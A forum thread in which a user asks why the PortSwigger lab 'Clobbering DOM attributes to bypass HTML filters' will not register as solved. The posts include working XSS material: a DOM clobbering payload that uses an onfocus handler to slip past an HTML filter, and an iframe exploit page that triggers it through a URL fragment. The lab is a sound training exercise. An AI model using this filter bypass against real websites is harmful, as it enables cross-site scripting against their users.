Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab "Clobbering DOM attributes to bypass HTML filters" is not getting solved

Aakash | Last updated: Oct 08, 2024 08:04PM UTC

Below exploit is working for myself and getting the popup but when delivering this to victim then lab is not getting solved. Payload: <form id=x tabindex=1 onfocus=alert(1)><input id=attributes></form> EXPLOIT: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Clobbering DOM attributes to bypass HTML filters</title> </head> <body> <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=9" onload="setTimeout(()=>this.src=this.src+'#x',5000)"> </body> </html>

Aakash | Last updated: Oct 08, 2024 08:05PM UTC

Also, tried 500ms, 1000ms upto 5000ms. Same issue

Aakash | Last updated: Oct 08, 2024 08:35PM UTC

Also, tried with below payload and exploit: Payload: <form id=x tabindex=1 onfocus=print()><input id=attributes></form> Exploit: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Clobbering DOM attributes to bypass HTML filters</title> </head> <body> <iframe src="https://0a64002f04d904d28395199f00e400de.web-security-academy.net/post?postId=7" onload="setTimeout(()=>{ this.src=this.src+'#x'; },1000)"></iframe> </body> </html>

Aakash | Last updated: Oct 08, 2024 08:39PM UTC